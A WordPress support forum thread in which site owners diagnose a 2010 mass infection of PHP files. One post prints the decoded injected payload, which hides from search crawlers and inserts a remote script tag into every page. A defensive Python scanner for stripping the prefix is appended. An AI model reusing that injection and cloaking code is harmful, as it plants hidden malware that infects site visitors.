2.9.2 site hacked (188 posts)

  1. ardvark
    Member
    Posted 3 years ago #

    I visited my WP 2.9.2 site today to get a warning about my site having malware associated with it. Looking at the source, I see a script entry in the HTML body going to http://zettapetta.com/js.php

    Looking at the index.php file, I see that the first line has been hacked with an eval command and a lot of garbage that obviously comprises part of the hack. The timestamps of a lot of WP files have been changed, indicating that they were modified sometime yesterday afternoon.

    Anyone else seen this hack yet; is there a fix? I only found one or two mentions of this online, but all my plugins are up to date and I'm not sure how to ensure this won't happen again after I do a restore from backup on the site.

    Thanks,
    Matt

  2. ardvark
    Member
    Posted 3 years ago #

    FYI, I don't have any indication that my hosting password was compromised, since it was very secure and I haven't seen damage apart from the WP site.

  3. Daniel Cid
    Member
    Posted 3 years ago #

    Hey,

    We are seeing lots of sites hacked with the same code today:

    http://blog.sucuri.net/2010/05/new-attack-today-against-wordpress.html

    http://sucuri.net/malware/entry/MW:MROBH:1

    Where is your site being hosted?

  4. Steve D
    Member
    Posted 3 years ago #

    Maybe they should contact this guy. He seems to know what he's doing.

    http://www.youtube.com/watch?v=nabz7t65eUM

  5. Daniel Cid
    Member
    Posted 3 years ago #

    Steve D: Wow. I am wondering if that has been fixed already.

    But in this latest issue, the sites are not restricted to one hosting provider.

  6. Emanuele Pisapia
    Member
    Posted 3 years ago #

    Hello, my sites in WordPress have the same problems...

    All the websites made with WordPress have a strange JS code that prints an iframe...

    How can I fix it...?

    P.S. They are not on Network Solutions

  7. Daniel Cid
    Member
    Posted 3 years ago #

    dragoonslair: Where is your site hosted?

    Check your footer.php, because in one case just this file was hacked. On others, everything was.

  8. ardvark
    Member
    Posted 3 years ago #

    I'm on Dreamhost, and the links above are exactly the issue.
    Also:
    http://www.wpsecuritylock.com/breaking-news-wordpress-hacked-with-zettapetta-on-dreamhost/

  9. mclanea
    Member
    Posted 3 years ago #

    I have about 10 sites infected. All hosted on Bluehost.

  10. Daniel Cid
    Member
    Posted 3 years ago #

    Does anyone here that got infected have a site with Apache logging enabled?

    We would love to see the logs if anyone can share.

  11. mclanea
    Member
    Posted 3 years ago #

    I've taken all of my sites offline until we can sort this out.

    Will there be a security release from WP?

  12. Daniel Cid
    Member
    Posted 3 years ago #

    No one knows yet how they got in. I am assuming it is not a bug in WordPress itself; otherwise the chaos would be much bigger.

    Maybe a plugin, stolen password?

  13. andrewacomb
    Member
    Posted 3 years ago #

    All my sites were hacked also.

    Running on GoDaddy servers and running WP 2.9.1

    Every single PHP file on the ENTIRE site has the malicious Base 64 code at the top. Didn't miss a single PHP file.

  14. andrewacomb
    Member
    Posted 3 years ago #

    Here is the Base 64 code "decoded", well sort of! Interesting, notice the googlebot and yahoo code.

    if(function_exists('ob_start')&&!isset($GLOBALS['mr_no'])){ $GLOBALS['mr_no']=1; if(!function_exists('mrobh')){ if(!function_exists('gml')){ function gml(){ if (!stristr($_SERVER["HTTP_USER_AGENT"],"googlebot")&& (!stristr($_SERVER["HTTP_USER_AGENT"],"yahoo"))){ return base64_decode("<script src="http://indesignstudioinfo.com/ls.php"></script>"); } return ""; } } if(!function_exists('gzdecode')){ function gzdecode(<script src="http://indesignstudioinfo.com/ls.php"></script>){ $R30B2AB8DC1496D06B230A71D8962AF5D=@ord(@substr($R5A9CF1B497502ACA23C8F611A564684C,3,1)); $RBE4C4D037E939226F65812885A53DAD9=10; $RA3D52E52A48936CDE0F5356BB08652F2=0; if($R30B2AB8DC1496D06B230A71D8962AF5D&4){ $R63BEDE6B19266D4EFEAD07A4D91E29EB=@unpack('v',substr($R5A9CF1B497502ACA23C8F611A564684C,10,2)); $R63BEDE6B19266D4EFEAD07A4D91E29EB=$R63BEDE6B19266D4EFEAD07A4D91E29EB[1]; $RBE4C4D037E939226F65812885A53DAD9+=2+$R63BEDE6B19266D4EFEAD07A4D91E29EB; } if($R30B2AB8DC1496D06B230A71D8962AF5D&8){ $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1; } if($R30B2AB8DC1496D06B230A71D8962AF5D&16){ $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1; } if($R30B2AB8DC1496D06B230A71D8962AF5D&2){ $RBE4C4D037E939226F65812885A53DAD9+=2; } $R034AE2AB94F99CC81B389A1822DA3353=@gzinflate(@substr($R5A9CF1B497502ACA23C8F611A564684C,$RBE4C4D037E939226F65812885A53DAD9)); if($R034AE2AB94F99CC81B389A1822DA3353===FALSE){ $R034AE2AB94F99CC81B389A1822DA3353=$R5A9CF1B497502ACA23C8F611A564684C; } return $R034AE2AB94F99CC81B389A1822DA3353; } } function mrobh($RE82EE9B121F709895EF54EBA7FA6B78B){ Header('Content-Encoding: none'); $RA179ABD3A7B9E28C369F7B59C51B81DE=gzdecode($RE82EE9B121F709895EF54EBA7FA6B78B); if(preg_match('/\<\/body/si',$RA179ABD3A7B9E28C369F7B59C51B81DE)){ return preg_replace('/(\<\/body[^\>]*\>)/si',gml()."\n".'$1',$RA179ABD3A7B9E28C369F7B59C51B81DE); }else{ 
return $RA179ABD3A7B9E28C369F7B59C51B81DE.gml(); } } ob_start('mrobh'); } }

    You can see at the bottom where it's "looking" for the BODY tag.

  15. mclanea
    Member
    Posted 3 years ago #

    Other sites I manage on Hostgator and even Bluehost were not affected.

    For now... just killed all of the sites by replacing the index file.

  16. clundie
    Member
    Posted 3 years ago #

    This happened to me today, on a site hosted with godaddy, which doesn't run WordPress and never has.

  17. Daniel Cid
    Member
    Posted 3 years ago #

    clundie: wow... On a site without wordpress?

  18. clundie
    Member
    Posted 3 years ago #

    Yes, never had WordPress installed on my site. Just a few .php files written by me, on a mostly static site. I don't have scripts to allow file uploads or anything like that. All the .php files got modified as described above. Now - my site is on shared hosting, so it's possible a WordPress site was hosted on the same server. My file permissions were set so that only I (the owner) could write/modify them, but maybe someone figured out how to bypass that. In any case I changed all my passwords, which were strong and unique. I also use a Mac & there is zero chance of a virus on it. Ironically I was already planning to leave Godaddy next week.

  19. jkelly11
    Member
    Posted 3 years ago #

    This script has been placed somewhere in the code that pulls my rss feed and I can't find it. Help!

    <script src="http://indesignstudioinfo.com/ls.php"></script>

    If you try to pull my feed, that's the error you get (www.thenewpioneersquare.com/feed) and I can't find the file that the code is in. I've fixed all of my other files, but this is nowhere.

    Does anyone know where I can find the file to remove this code? I've been looking in files for the past 2 hours and have found nothing so far.

    Thanks!!!!

  20. James
    Happiness Engineer
    Posted 3 years ago #

  21. cogmios
    Member
    Posted 3 years ago #

    From what I read on the other forums, chmod-ing the files to non-'open' should help.

  22. Steve D
    Member
    Posted 3 years ago #

    FTP and File Manager access down now at NS. At least on our server. Can't access my own files.

    Says my own password and user ID is incorrect.

    Total chaos.

  23. Daniel Cid
    Member
    Posted 3 years ago #

    jkelly11: This file is hidden from an encoded PHP string on all your files.

    You can get more info here:
    http://sucuri.net/malware/entry/MW:MROBH:1

  24. Steve D
    Member
    Posted 3 years ago #

    Be cautious; people have been getting infected just by checking their own sites.

  25. jkelly11
    Member
    Posted 3 years ago #

    Thanks @dd -- I've deleted a lot of that code in the php string (in my case, it infected all of my .php files), so I don't understand why I'm still getting the error on my rss feed.

    Are you not able to just delete the inserted code and clean it up?

    I'm a little nervous to do the whole backup, erase, redo (because of how new I am to wordpress). I was hoping to take care of it by just finding the code.

  26. Steve D
    Member
    Posted 3 years ago #

    dd@sucuri.net

    The problem is the criminals are launching everything in the book at us. It's like dodging bullets at this point. You clean up, and then another surprise shows up out of nowhere totally unrelated to the previous hack and a completely new technique.

    They are getting a hold of and compromising everything. Mail, FTP, Site, etc., etc.

    And who the heck knows what else at this point.

  27. Daniel Cid
    Member
    Posted 3 years ago #

    jkelly11: You probably missed a file or two. Especially inside the themes, wp-includes or plugins. Shoot me an email and I can send a script to automatically do it for you.

  28. Steve D
    Member
    Posted 3 years ago #

    Error: Authentication failed.
    Error: Critical error
    Error: Could not connect to server

    Obviously you can't check and try to protect your web site assets either when SFTP returns this all day.

  29. Go Daddy
    Go Daddy Support
    Posted 3 years ago #

    @clundie
    This is not necessarily specific to WordPress, that's just one of the more popular apps. The real concern is insecure PHP code, which is more likely to exist in apps that haven't been properly updated.

    If there's another installation that's been exploited in the same hosting account, it could affect your other sites, but not across accounts or across customers on the same server.

    Our security team can take a look by submitting your information here: http://fwd4.me/Mrd

    Alicia

  30. Daniel Cid
    Member
    Posted 3 years ago #

    Hey all,

    Simple script to automatically clean this up for you:

    http://blog.sucuri.net/2010/05/simple-cleanup-solution-for-latest.html

    I just cleaned a few sites using it and it takes less than 5 minutes.
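    The "missed a file or two" problem in posts 27 and 30 comes from the prefix being prepended to every .php file, including themes, wp-includes and plugins. The scanner below is an added example, not the Sucuri script linked above: it walks a site tree, decodes each leading eval(base64_decode()) block and flags only those whose payload carries the mr_no/mrobh strings seen in the decoded code posted earlier. The exact on-disk wrapper format and the sample file are constructed assumptions.

```python
import base64
import os
import re
import tempfile
# Assumed on-disk form (thread only says "an eval command" on line 1): <?php /**/eval(base64_decode("...")); ?>
INJECT_RE = re.compile(r'<\?php\s*(?:/\*.*?\*/\s*)?eval\(base64_decode\(["\']([A-Za-z0-9+/=]+)["\']\)\);\s*\?>')
# Strings from the decoded payload posted above; a benign eval(base64_decode()) lacks them.
MARKERS = ("$GLOBALS['mr_no']", "ob_start('mrobh')", "function mrobh")

def clean_source(src):
    """Return src with the injected prefix removed, or None if no MW:MROBH:1 prefix is present."""
    m = INJECT_RE.search(src)
    try:
        decoded = base64.b64decode(m.group(1)).decode("latin-1")
    except (AttributeError, ValueError):  # no match, or malformed base64
        return None
    if not any(k in decoded for k in MARKERS):
        return None  # some other eval(base64_decode()) block, not this campaign
    return src[:m.start()] + src[m.end():]

def scan_tree(root):
    """Paths of every .php file under root carrying the prefix (themes, wp-includes, plugins too)."""
    hits = []
    for dirpath, _, names in os.walk(root):
        for name in (n for n in names if n.endswith(".php")):
            path = os.path.join(dirpath, name)
            with open(path, encoding="latin-1") as fh:
                if clean_source(fh.read()) is not None:
                    hits.append(path)
    return sorted(hits)

def clean_file(path):
    """Rewrite one file without the prefix; True if modified, False if it was already clean."""
    with open(path, encoding="latin-1") as fh:
        cleaned = clean_source(fh.read())
    if cleaned is None:
        return False
    with open(path, "w", encoding="latin-1") as fh:
        fh.write(cleaned)
    return True

def build_demo_site():
    """Constructed mini site on disk: one theme file with the base64-wrapped, marker-bearing prefix."""
    b64 = base64.b64encode(b"if(function_exists('ob_start')&&!isset($GLOBALS['mr_no'])){ ob_start('mrobh'); }").decode()
    root = tempfile.mkdtemp()
    theme = os.path.join(root, "wp-content", "themes", "demo")
    os.makedirs(theme)
    with open(os.path.join(theme, "footer.php"), "w", encoding="latin-1") as fh:
        fh.write('<?php /**/eval(base64_decode("%s")); ?><?php\necho "footer";\n' % b64)
    return root
```

    Run scan_tree() on a copy of the site first and diff a few hits by hand; restoring from a known-good backup remains the safer fix when the infection may have touched more than this prefix.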
